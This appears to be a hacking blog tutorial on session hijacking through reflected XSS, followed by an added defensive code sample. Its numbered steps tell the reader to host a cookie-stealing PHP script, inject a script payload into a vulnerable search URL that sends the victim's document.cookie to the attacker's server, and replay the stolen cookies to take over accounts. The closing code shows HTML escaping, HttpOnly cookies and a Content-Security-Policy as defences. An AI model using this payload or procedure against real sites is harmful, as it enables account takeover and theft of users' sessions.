Session Hijacking using XSS
Session Hijacking
Session hijacking can be defined as impersonating and sending a request as a user other than yourself.
In layman's terms, it is similar to plane hijacking, where a terrorist takes control of the plane, except that here the hacker takes control of the session. It can be done in many ways, the most common being stealing a user's cookies.
Procedure
1) Find a website that is vulnerable to XSS. Let us assume that the site abc.com is vulnerable to XSS.
2) Assume that when a search (which is vulnerable to XSS) is performed on the website, parameters are passed in the URL in the format http://abc.com/?s=hello
3) Now we need to save the cookies of the user.
4) Copy the code from my repository at https://github.com/rohankalra97/Session-Hijacking/blob/master/stealer.php and save it as stealer.php
5) Replace the 5th line with the URL to which you want the user to be finally redirected.
6) Create an empty file named log.txt.
7) Now push the file to your own server. Let us assume that the server to which you pushed it is xyz.com.
8) Now, to steal the cookies, we need to edit the search URL and add the following script to it: <script>location.href = 'http://xyz.com/stealer.php?cookie='+document.cookie;</script>
9) Now we need to send the user the abc.com URL with the script added:
http://abc.com/?s=<script>location.href = 'http://xyz.com/stealer.php?cookie='+document.cookie;</script>
10) On opening the URL, the user will be redirected to xyz.com, the cookies will be stored in log.txt, and the user will then be redirected to the URL you set in step 5.
11) On saving those cookies to your browser, you will get access to that user's account.
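From the defending side, steps 8 to 11 depend on two things: abc.com writing the s parameter into the page without encoding it, and the session cookie being readable through document.cookie. The following added example (not part of the original post or the author's repository) shows a hypothetical search handler in its vulnerable and hardened forms, together with HttpOnly session cookie attributes; the function names, the sid cookie name and the CSP value are assumptions.

```javascript
// Constructed sample: the query value from the URL in step 9.
const SAMPLE_QUERY =
  "<script>location.href = 'http://xyz.com/stealer.php?cookie='+document.cookie;</script>";

// Vulnerable form: the search term is concatenated into HTML unchanged,
// so a <script> element in ?s= is parsed and executed by the browser.
function renderSearchVulnerable(term) {
  return `<h1>Results for ${term}</h1>`;
}

// HTML-encode the five characters that can change the parsing context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened form: same page, but the term is encoded for the HTML body context.
function renderSearchHardened(term) {
  return `<h1>Results for ${escapeHtml(term)}</h1>`;
}

// Session cookie attributes (cookie name "sid" is hypothetical): HttpOnly hides
// the cookie from document.cookie, Secure restricts it to HTTPS, and
// SameSite=Lax limits cross-site sending.
function sessionCookieHeader(sessionId) {
  return `Set-Cookie: sid=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Model of what page script can read: document.cookie omits HttpOnly cookies.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .map((h) => h.replace(/^Set-Cookie:\s*/i, '').split(';').map((p) => p.trim()))
    .filter((parts) => !parts.slice(1).some((a) => a.toLowerCase() === 'httponly'))
    .map((parts) => parts[0])
    .join('; ');
}

// Response headers for the hardened page: a CSP without 'unsafe-inline'
// blocks inline <script> even if an encoding bug slips through elsewhere.
function hardenedHeaders(sessionId) {
  return [
    sessionCookieHeader(sessionId),
    "Content-Security-Policy: default-src 'self'; script-src 'self'",
  ];
}
```

With the hardened renderer the value from step 9 is displayed as text instead of being executed, and with HttpOnly set the session cookie is absent from document.cookie even where another injection point remains.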
Always remember to use Kali for helpful purposes and not use it to cause harm.
Stay Safe.
Follow us on Facebook:- Facebook.com/VAPTHacker
LinkedIn:- https://www.linkedin.com/in/rohankalra97/
Twitter:- https://twitter.com/rohankalra97